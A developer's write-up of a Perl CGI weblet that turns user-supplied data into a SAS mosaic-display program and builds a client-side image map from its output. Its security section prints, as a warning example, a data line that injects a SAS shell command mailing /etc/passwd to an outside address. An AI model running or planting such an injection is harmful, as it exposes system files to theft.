Mosaics: About This Weblet

mosaics was written as a Perl server-based CGI script. It could have been written as a Java application, which would provide a somewhat nicer user interface, but that would limit the application to those with Java-capable browsers. Think of it as a Weblet for the Java-challenged.

How Does it Work?

The entire thing is done by the CGI script. After printing the forms, the program:
  1. retrieves the input parameters from the CGI query,
  2. reads and parses the data, either from a sample file, from the form, or from an uploaded file,
  3. writes a SAS program, interpolating the user's data into a template,
  4. runs the program (by a system() call), producing a PostScript file and one or more files containing the imagemap information,
  5. converts each PostScript page to a GIF image,
  6. reads the imagemap information, massaging it into the form of a client-side image map,
  7. reads and parses the SAS listing file to extract the Model summary information,
  8. returns the image to the browser, together with links to the SAS program, the output listing file, and a small JavaScript function which activates the imagemap.
I cribbed the basic structure from my Sieve Diagram script, but I had learned a bit in the interim.

Data Structure

Most form-based web applications need to get only a few numbers or selections from the user, and it is not difficult to validate these, either in the server CGI script or with client-side JavaScript.

It is considerably harder to provide a general method for the user to input a dataset -- a table consisting of an arbitrary number of numeric or character variables with an arbitrary number of observations (rows). In the mosaics application, we need to:

SAS datasets consist of a data table plus a data dictionary, and mosaics constructs something similar using a "hash", a Perl data structure like an association list.

The %dataset structure is shown below:

Contents                        Perl constructor
Dataset title (string)          $dataset->{TITLE} = $title;
Number of rows (scalar)         $dataset->{ROWS} = $rows;
Number of columns (scalar)      $dataset->{COLS} = scalar @col_type;
Variable names (list)           $dataset->{VARS} = [ @vars ];
Variable types (list)           $dataset->{TYPE} = [ @col_type ];
Variable field width (list)     $dataset->{LENGTH} = [ @col_length ];
Data table (string)             $dataset->{DATA} = join("\n", @data);
The data table itself is parsed as a list of its rows (@data), but then stored as a newline-delimited string. Variable types are stored as 'C' or 'N', with the rule that a variable is considered character if any row contains a value that fails the numeric test (/-?\d+/).
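A minimal sketch of how such a structure might be filled in from parsed rows. The helper name make_dataset, the whitespace-delimited row format, and the anchored integer-only form of the numeric test are assumptions made for illustration; they are not taken from the mosaics source.

```perl
use strict;
use warnings;

# Hypothetical helper (not from the mosaics source): build the dataset hash
# from a title, a list of variable names, and whitespace-delimited rows.
sub make_dataset {
    my ($title, $vars, @data) = @_;
    my $cols       = scalar @$vars;
    my @col_type   = ('N') x $cols;    # assume numeric until shown otherwise
    my @col_length = (0) x $cols;

    foreach my $row (@data) {
        my @fields = split ' ', $row;
        foreach my $i (0 .. $cols - 1) {
            my $value = defined $fields[$i] ? $fields[$i] : '';
            # Assumed rule: anything that is not a plain integer (including
            # a missing field) makes the whole column a character variable.
            $col_type[$i] = 'C' unless $value =~ /^-?\d+$/;
            # Track the widest value seen in each column.
            $col_length[$i] = length($value) if length($value) > $col_length[$i];
        }
    }

    my $dataset = {};
    $dataset->{TITLE}  = $title;
    $dataset->{ROWS}   = scalar @data;
    $dataset->{COLS}   = scalar @col_type;
    $dataset->{VARS}   = [ @$vars ];
    $dataset->{TYPE}   = [ @col_type ];
    $dataset->{LENGTH} = [ @col_length ];
    $dataset->{DATA}   = join("\n", @data);
    return $dataset;
}

my $example = make_dataset('Hair and eye color',
    [qw(HAIR EYE SEX COUNT)],
    'Brown Black M 32', 'Blond Blue F 64');
print join(' ', @{ $example->{TYPE} }), "\n";    # one type code per variable
```

Copying the lists into anonymous arrays ([ @col_type ]) keeps the stored structure independent of the working variables, which matches the constructors in the table above.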

Security

Security is always a problem when dealing with form or uploaded data which is passed to another program. We wouldn't like to be on the receiving end of a "dataset" which contained the following:
Fee Fie   Fo  Fum 234
Ima Gonna Get Ya  123
;;;; x "mail -s 'HaHa' cracker@net.net </etc/passwd";
The data therefore is scrubbed to remove all characters which should not appear in ordinary data.
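One way such scrubbing could be done is with a whitelist: keep only the characters expected in ordinary data and drop everything else. The sketch below is an assumption, not the actual mosaics code; the function name scrub and the particular set of allowed characters are hypothetical.

```perl
use strict;
use warnings;

# Hypothetical scrubber: the whitelist below is an assumption, not the
# character set used by the actual mosaics script.
sub scrub {
    my ($text) = @_;
    $text =~ s/\r\n?/\n/g;                  # normalize line endings
    $text =~ s/[^A-Za-z0-9_.\- \t\n]//g;    # keep letters, digits, _ . - and whitespace
    return $text;
}

my $evil = qq{;;;; x "mail -s 'HaHa' cracker\@net.net </etc/passwd";\n};
print scrub($evil);    # semicolons, quotes, '<' and '/' are gone
```

With the semicolons and quotes removed, the hostile line can no longer end the datalines block or form a SAS x statement; it is just an odd-looking row of data.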

SAS Data Step

This data structure makes it fairly simple to perform some reasonable (but rudimentary) validation on the dataset and variables, and to construct the SAS data step in a general way:
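	my @vars  = @{$dataset->{VARS}};
	my @type  = @{$dataset->{TYPE}};
	my $data  = $dataset->{DATA};           # newline-delimited data rows
	my $invar = '';
	foreach my $i (0..$#vars) {             # construct input variable list
		$invar .= $vars[$i];
		$invar .= $type[$i] eq 'C' ? ' $ ' : ' ';   # '$' marks a character variable
	}

	# $invar and $data are interpolated into the here-document
	my $datastep = <<END_OF_DATASTEP;
data temp;
	input $invar;
datalines;
$data
END_OF_DATASTEP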
So, if the variables are HAIR, EYE, SEX (all character) and COUNT, the data step becomes:
data temp;
	input HAIR $ EYE $ SEX $ COUNT;
datalines;
Brown Black M  32
 ...

Imagemapping

MOSAICS.SAS maintains a table of the coordinates of all tiles in the mosaic display. I wrote an add-in module to convert these coordinates to a format which could be used as a client-side image map. This was not straightforward, because:
  • The mosaic uses a coordinate system with (0,0) as the lower left corner of the bottom-left tile and (100,100) as the upper right corner of the top-right tile. Imagemaps use a coordinate system in pixels, with (0,0) as the top-left corner.
  • That wouldn't be hard, except that there seems to be no reliable way in SAS/IML to determine the bounding box of the entire figure when the labels and title are added around the mosaic tiles. This introduces slight errors in the imagemap coordinates of the boxes, but they are now not perceptible except at high magnification.
Nonetheless, the SAS module does its best and produces a table containing one row for each tile in the mosaic, with the cell label, imagemap coordinates, and cell statistics (observed frequency, fitted frequency, residual) in the following format (chosen to be particularly easy to parse in Perl):
Black:Brown|   69  435  211  915|    68   40.1    4.4
Black:Blue |   69  266  211  407|    20   39.2   -3.1
Black:Hazel|   69  131  211  237|    15   17.0   -0.5
Black:Green|   69   68  211  103|     5   11.7   -2.0
Brown:Brown|  239  598  614  915|   119  106.3    1.2
Brown:Blue |  239  346  614  570|    84  103.9   -1.9
Brown:Hazel|  239  173  614  317|    54   44.9    1.4
  ...
Since the SAS program cannot know the size of the final GIF image, it uses coordinates in the range of (0..1000). mosaics extracts the actual size of the image from the GIF file itself, and rescales these to the proper range.
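A sketch of the parsing and rescaling step, under some assumptions. A GIF file stores its width and height as two 16-bit little-endian integers right after the 6-byte signature, so the first 10 bytes of the file are enough. The function names gif_size and parse_tile, the returned hash layout, and the rounding to the nearest pixel are hypothetical choices, not the mosaics code itself.

```perl
use strict;
use warnings;

# Read the width and height from the first 10 bytes of a GIF file.
# Bytes 0-5 are the signature ("GIF87a" or "GIF89a"); bytes 6-9 hold the
# width and height as 16-bit little-endian integers.
sub gif_size {
    my ($header) = @_;
    return unless $header =~ /^GIF8[79]a/;
    return unpack('v2', substr($header, 6, 4));
}

# Parse one line of the tile table and rescale from (0..1000) to pixels.
sub parse_tile {
    my ($line, $width, $height) = @_;
    my ($label, $coords, $stats) = split /\|/, $line;
    $label =~ s/\s+$//;                              # trim padding after the label
    my ($x1, $y1, $x2, $y2) = split ' ', $coords;
    my ($obs, $fit, $resid) = split ' ', $stats;
    return {
        LABEL  => $label,
        COORDS => [ map { int($_ + 0.5) }            # round to the nearest pixel
                    $x1 * $width / 1000, $y1 * $height / 1000,
                    $x2 * $width / 1000, $y2 * $height / 1000 ],
        STATS  => [ $obs, $fit, $resid ],
    };
}

# A real script would read the header from the GIF file (in binmode);
# here a header for a made-up 500 x 400 image is built with pack().
my ($width, $height) = gif_size(pack('A6 v2', 'GIF89a', 500, 400));
my $tile = parse_tile('Black:Brown|   69  435  211  915|    68   40.1    4.4',
                      $width, $height);
print "$tile->{LABEL}: ", join(',', @{ $tile->{COORDS} }), "\n";
```

Splitting first on "|" and then on whitespace is what makes the SAS output format easy to handle: each of the three fields can be taken apart with a single split.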

mosaics uses these rescaled coordinates to produce a client-side image map, of the form,

<map name="mos1168i1">
  <area shape=rect coords="0,20,42,276"
   href="javascript:Show('Black','108','148.0','-3.3');">
  <area shape=rect coords="51,20,165,276"
   href="javascript:Show('Brown','286','148.0','11.3');">
  <area shape=rect coords="174,20,202,276"
    href="javascript:Show('Red','71','148.0','-6.3');">
  <area shape=rect coords="211,20,262,276" 
   href="javascript:Show('Blond','127','148.0','-1.7');">
  <area shape=default href="javascript:Show('Select a cell','','','');"
	 onMouseOver="window.status='Select a cell'; return true;">
</map>
The GIF image is connected to the image map by including the USEMAP= attribute in the <IMG> tag.
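The map itself could be generated along the following lines. This is only a sketch: the function name image_map, the layout of the area records, and the GIF file name in the last line are assumptions made for illustration. Labels are assumed to have been scrubbed already, so they contain no quote characters.

```perl
use strict;
use warnings;

# Hypothetical generator: builds the <map> element from a list of areas,
# each holding pixel COORDS, a LABEL and the STATS passed to Show().
sub image_map {
    my ($name, @areas) = @_;
    my $html = qq{<map name="$name">\n};
    foreach my $area (@areas) {
        my $coords = join ',', @{ $area->{COORDS} };
        # Quote each argument for the JavaScript call.
        my $args = join ',', map { sprintf("'%s'", $_) }
                   $area->{LABEL}, @{ $area->{STATS} };
        $html .= qq{  <area shape=rect coords="$coords"\n};
        $html .= qq{   href="javascript:Show($args);">\n};
    }
    $html .= qq{  <area shape=default href="javascript:Show('Select a cell','','','');">\n};
    $html .= "</map>\n";
    return $html;
}

my $map = image_map('mos1168i1',
    { LABEL => 'Black', COORDS => [ 0, 20, 42, 276 ],
      STATS => [ 108, '148.0', '-3.3' ] });
print $map;
# The image refers to the map by name, with a leading '#'.
print qq{<img src="mos1168i1.gif" usemap="#mos1168i1">\n};
```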

To Do

  • Add the ability to reorder the variables in the dataset. [Done, but not well tested]
  • Improve error trapping, particularly for entered or uploaded data.
  • Figure out how to serve each graph on a separate page, with controls to navigate from one to the next.